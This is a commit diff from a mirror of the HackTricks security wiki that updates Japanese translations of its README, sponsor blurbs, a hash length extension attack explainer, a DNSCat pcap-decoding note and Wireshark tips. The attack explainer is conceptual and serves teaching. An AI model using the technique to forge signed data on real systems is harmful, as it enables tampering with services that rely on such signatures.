mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.
This commit is contained in:
parent
7d09db559c
commit
b3c7468d26
35 changed files with 1028 additions and 998 deletions
56
README.md
56
README.md
|
@ -1,30 +1,30 @@
|
|||
# ハックトリック
|
||||
# HackTricks
|
||||
|
||||
<figure><img src=".gitbook/assets/hacktricks.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
_Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_によるものです。_
|
||||
_Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
|
||||
|
||||
{% hint style="success" %}
|
||||
**CTF、実際のアプリ、リサーチ、ニュースから学んだハッキングトリック/テクニック/その他を見つけるウィキへようこそ。**
|
||||
{% endhint %}
|
||||
|
||||
始めるには、1台以上の**マシンをペンテストする際に従うべき典型的なフロー**を見つけるこちらのページに従ってください:
|
||||
始めるには、1台以上の**マシンをペンテストする際に従うべき典型的なフロー**を見つけることができるこのページに従ってください:
|
||||
|
||||
{% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %}
|
||||
[pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## コーポレートスポンサー
|
||||
## Corporate Sponsors
|
||||
|
||||
### [STM Cyber](https://www.stmcyber.com)
|
||||
|
||||
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**STM Cyber**](https://www.stmcyber.com) は、**HACK THE UNHACKABLE**をスローガンに掲げる優れたサイバーセキュリティ企業です。彼らは独自の研究を行い、独自のハッキングツールを開発して、ペンテスト、Redチーム、トレーニングなどの貴重なサイバーセキュリティサービスを提供しています。
|
||||
[**STM Cyber**](https://www.stmcyber.com)は、**HACK THE UNHACKABLE**というスローガンを掲げる優れたサイバーセキュリティ企業です。彼らは独自の研究を行い、独自のハッキングツールを開発して、ペンテスト、Redチーム、トレーニングなど、さまざまな貴重なサイバーセキュリティサービスを提供しています。
|
||||
|
||||
彼らの**ブログ**は[**https://blog.stmcyber.com**](https://blog.stmcyber.com)で確認できます。
|
||||
|
||||
**STM Cyber**はHackTricksのようなサイバーセキュリティオープンソースプロジェクトもサポートしています :)
|
||||
**STM Cyber**はHackTricksのサポートもしています :)
|
||||
|
||||
***
|
||||
|
||||
|
@ -32,7 +32,7 @@ _Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://w
|
|||
|
||||
<figure><img src=".gitbook/assets/image (42).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com) はスペインで最も関連性の高いサイバーセキュリティイベントであり、ヨーロッパでも最も重要なイベントの1つです。技術知識の促進を使命とするこの会議は、あらゆる分野のテクノロジーとサイバーセキュリティ専門家の熱い出会いの場です。
|
||||
[**RootedCON**](https://www.rootedcon.com)は、**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの1つです。**技術的知識の促進**を使命とするこの会議は、あらゆる分野のテクノロジーとサイバーセキュリティ専門家の熱い出会いの場です。
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
|
@ -55,9 +55,9 @@ _Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://w
|
|||
<figure><img src=".gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによってパワードされた**ワークフローを簡単に構築**および**自動化**できます。
|
||||
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も**高度なコミュニティツール**によって強化された**ワークフローを簡単に構築**および**自動化**できます。
|
||||
|
||||
今すぐアクセスを取得:
|
||||
今すぐアクセスしてください:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
|
@ -70,10 +70,10 @@ _Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://w
|
|||
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るために[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)サーバーに参加しましょう!
|
||||
|
||||
* **ハッキングの洞察:** ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加
|
||||
* **リアルタイムハックニュース:** リアルタイムのニュースと洞察を通じてハッキングの世界を最新の状態に保つ
|
||||
* **リアルタイムハックニュース:** リアルタイムのニュースと洞察を通じて、迅速なハッキングワールドに最新情報をキャッチアップ
|
||||
* **最新の発表:** 新しいバグバウンティの開始や重要なプラットフォームの更新に関する情報を把握
|
||||
|
||||
**[Discord](https://discord.com/invite/N3FrSbmwdy)**に参加して、今日からトップハッカーと協力を始めましょう!
|
||||
**[**Discord**](https://discord.com/invite/N3FrSbmwdy)**に参加して、今日からトップハッカーと協力を始めましょう!**
|
||||
|
||||
***
|
||||
|
||||
|
@ -81,7 +81,7 @@ _Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://w
|
|||
|
||||
<figure><img src=".gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**脆弱性評価およびペネトレーションテストのための即座に利用可能なセットアップ**。レコンからレポート作成まで、20以上のツールと機能を使用してどこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむためのカスタムツール、検出、およびエクスプロイトモジュールを開発しています。
|
||||
**脆弱性評価およびペネトレーションテストのための即座に利用可能なセットアップ**。20以上のツールと機能を備えた完全なペンテストをどこからでも実行します。私たちはペンテスターを置き換えるのではなく、彼らに時間を戻してより深く掘り下げ、シェルをポップし、楽しむためのカスタムツール、検出、およびエクスプロイトモジュールを開発しています。
|
||||
|
||||
{% embed url="https://pentest-tools.com/" %}
|
||||
|
||||
|
@ -91,14 +91,14 @@ _Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://w
|
|||
|
||||
<figure><img src=".gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
SerpApiは、検索エンジン結果にアクセスするための高速で簡単なリアルタイムAPIを提供しています。彼らは検索エンジンをスクレイピングし、プロキシを処理し、キャプチャを解決し、すべてのリッチな構造化データを解析します。
|
||||
SerpApiは、高速で簡単なリアルタイムAPIを提供して、**検索エンジンの結果にアクセス**できます。彼らは検索エンジンをスクレイピングし、プロキシを処理し、キャプチャを解決し、すべてのリッチな構造化データを解析します。
|
||||
|
||||
SerpApiのプランに加入すると、Google、Bing、Baidu、Yahoo、Yandexなど、さまざまな検索エンジンをスクレイピングするための50以上の異なるAPIにアクセスできます。\
|
||||
他のプロバイダとは異なり、**SerpApiは有機的な結果だけでなく**、広告、インライン画像や動画、ナレッジグラフなど、検索結果に表示される他の要素や機能を一貫して含めます。
|
||||
|
||||
現在のSerpApiの顧客には、**Apple、Shopify、GrubHub**などが含まれます。\
|
||||
現在のSerpApiの顧客には**Apple、Shopify、GrubHub**などが含まれます。\
|
||||
詳細については、彼らの[**ブログ**](https://serpapi.com/blog/)をチェックするか、彼らの[**プレイグラウンド**](https://serpapi.com/playground)で例を試してみてください。\
|
||||
こちらで[**無料アカウント**](https://serpapi.com/users/sign_up)**を作成**できます。
|
||||
無料アカウントを[**こちら**](https://serpapi.com/users/sign\_up)で作成できます。
|
||||
|
||||
***
|
||||
|
||||
|
@ -114,30 +114,30 @@ SerpApiのプランに加入すると、Google、Bing、Baidu、Yahoo、Yandex
|
|||
|
||||
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WebSec**](https://websec.nl) は、**アムステルダム**を拠点とするプロフェッショナルなサイバーセキュリティ企業であり、**現代的なアプローチ**でビジネスを**世界中**の最新のサイバーセキュリティ脅威から保護するのを支援します。
|
||||
[**WebSec**](https://websec.nl)は、**アムステルダム**を拠点とするプロフェッショナルなサイバーセキュリティ企業で、**現代的なアプローチ**でビジネスを**世界中**の最新のサイバーセキュリティ脅威から保護するのを支援します。
|
||||
|
||||
WebSecは**すべてを網羅するセキュリティ企業**であり、ペンテスト、**セキュリティ**監査、意識向上トレーニング、フィッシングキャンペーン、コードレビュー、エクスプロイト開発、セキュリティエキスパートの外部委託などを提供しています。
|
||||
WebSecは**すべてを手掛けるセキュリティ企業**であり、ペンテスト、**セキュリティ**監査、意識向上トレーニング、フィッシングキャンペーン、コードレビュー、エクスプロイト開発、セキュリティエキスパートの外部委託などを提供しています。
|
||||
|
||||
WebSecのもう1つの素晴らしい点は、業界平均とは異なり、WebSecは**自分たちのスキルに非常に自信**を持っており、その程度まで**最高品質の結果を保証**しています。彼らのウェブサイトには「**私たちがハックできない場合、支払いは不要です!**」と記載されています。詳細については、彼らの[**ウェブサイト**](https://websec.nl/en/)と[**ブログ**](https://websec.nl/blog/)をご覧ください!
|
||||
WebSecのもう1つの素晴らしい点は、業界平均とは異なり、WebSecは**自分たちのスキルに非常に自信**を持っており、彼らのウェブサイトには「**ハックできなければ、支払いは不要です!**」と記載されています。詳細については、彼らの[**ウェブサイト**](https://websec.nl/en/)と[**ブログ**](https://websec.nl/blog/)をご覧ください!
|
||||
|
||||
上記に加えて、WebSecはHackTricksの**熱心な支持者**でもあります。
|
||||
|
||||
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
## ライセンスと免責事項
|
||||
|
||||
以下で確認してください:
|
||||
彼らをチェックしてください:
|
||||
|
||||
{% content-ref url="welcome/hacktricks-values-and-faq.md" %}
|
||||
[hacktricks-values-and-faq.md](welcome/hacktricks-values-and-faq.md)
|
||||
|
@ -145,14 +145,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong>!</summary>
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローする。**
|
||||
* **ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する。**
|
||||
* [**公式PEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を入手してください
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
|
||||
* **ハッキングトリックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,24 +1,24 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見る
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* **ハッキングテクニックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
* **ハッキングテクニックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -28,12 +28,12 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
# 攻撃の概要
|
||||
|
||||
あるサーバーが、ある既知のクリアテキストデータに**秘密**を**追加**してそのデータをハッシュ化していると想像してください。以下を知っている場合:
|
||||
あるサーバーが、ある既知のクリアテキストデータに**秘密**を**追加**してそのデータに署名していると想像してください。以下を知っている場合:
|
||||
|
||||
* **秘密の長さ**(これは与えられた長さ範囲からもブルートフォースできます)
|
||||
* **クリアテキストデータ**
|
||||
* **アルゴリズム(およびこの攻撃に脆弱)**
|
||||
* **パディングが既知**
|
||||
* **アルゴリズム(およびこの攻撃に対して脆弱である)**
|
||||
* **パディングが既知である**
|
||||
* 通常、デフォルトのものが使用されるため、他の3つの要件が満たされている場合、これも満たされます
|
||||
* パディングは秘密+データの長さに応じて異なります。そのため、秘密の長さが必要です
|
||||
|
||||
|
@ -41,7 +41,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## 方法
|
||||
|
||||
基本的に、脆弱なアルゴリズムは、まず**データブロックをハッシュ化**し、その後、**以前に**作成された**ハッシュ**(状態)から、**次のデータブロックを追加**して**ハッシュ化**します。
|
||||
基本的に、脆弱なアルゴリズムは、まず**データのブロックをハッシュ**し、その後、**以前に**作成された**ハッシュ**(状態)から、**次のデータのブロックを追加**して**ハッシュ**します。
|
||||
|
||||
次に、秘密が「secret」でデータが「data」であると想像してください。「secretdata」のMD5は6036708eba0d11f6ef52ad44e8b74d5bです。\
|
||||
攻撃者が文字列「append」を追加したい場合は:
|
||||
|
@ -57,15 +57,15 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## 参考文献
|
||||
|
||||
この攻撃については、[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)で詳しく説明されています。
|
||||
この攻撃については、[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)で詳しく説明されています
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -73,14 +73,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見る
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* **ハッキングテクニックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
* **ハッキングテクニックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
|
||||
|
||||
</details>
|
||||
|
|
|
@ -5,15 +5,28 @@
|
|||
HackTricks をサポートする他の方法:
|
||||
|
||||
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**をフォローする**
|
||||
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出する**
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で **フォロー**する。
|
||||
* **ハッキングトリックを共有するには、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
|
||||
|
||||
</details>
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
DNSCat によって**暗号化を使用せずに**データが**外部に持ち出されている**PCAPがある場合、外部に持ち出されたコンテンツを見つけることができます。
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されているかどうかを確認するための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
DNSCatによって**暗号化を使用せずに**データが**外部に送信**されるpcapを持っている場合、外部に送信されたコンテンツを見つけることができます。
|
||||
|
||||
**最初の9バイト**は実際のデータではなく、**C\&C通信**に関連していることを知っていれば十分です。
|
||||
```python
|
||||
|
@ -46,12 +59,12 @@ python3 dnscat_decoder.py sample.pcap bad_domain
|
|||
|
||||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する。
|
||||
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを発見する
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**をフォローする。**
|
||||
* **ハッキングトリックを共有するためにPRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **githubリポジトリに提出する。**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,21 +1,33 @@
|
|||
# Wiresharkのトリック
|
||||
|
||||
## Wiresharkのトリック
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
|
||||
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)をフォローする
|
||||
- **Hackingトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Wiresharkスキルの向上
|
||||
|
||||
### チュートリアル
|
||||
|
@ -27,54 +39,54 @@ HackTricksをサポートする他の方法:
|
|||
- [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
|
||||
- [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
|
||||
|
||||
### 分析情報
|
||||
### 分析された情報
|
||||
|
||||
**専門家情報**
|
||||
|
||||
_Analyze_ --> _Expert Information_をクリックすると、**分析された**パケットで何が起こっているかの**概要**が表示されます:
|
||||
|
||||
![](<../../../.gitbook/assets/image (570).png>)
|
||||
![](<../../../.gitbook/assets/image (253).png>)
|
||||
|
||||
**解決されたアドレス**
|
||||
|
||||
_Statistics_ --> _Resolved Addresses_の下には、wiresharkによって**解決された**ポート/トランスポートからプロトコル、MACから製造業者など、いくつかの**情報**が表示されます。通信に何が関与しているかを知ることは興味深いです。
|
||||
_Statistics_ --> _Resolved Addresses_の下には、wiresharkによって**解決された**ポート/トランスポートからプロトコル、MACから製造業者など、いくつかの**情報**が表示されます。通信に関わるものを知ることは興味深いです。
|
||||
|
||||
![](<../../../.gitbook/assets/image (571).png>)
|
||||
![](<../../../.gitbook/assets/image (890).png>)
|
||||
|
||||
**プロトコル階層**
|
||||
|
||||
_Statistics_ --> _Protocol Hierarchy_の下には、通信に**関与しているプロトコル**とそれに関するデータが表示されます。
|
||||
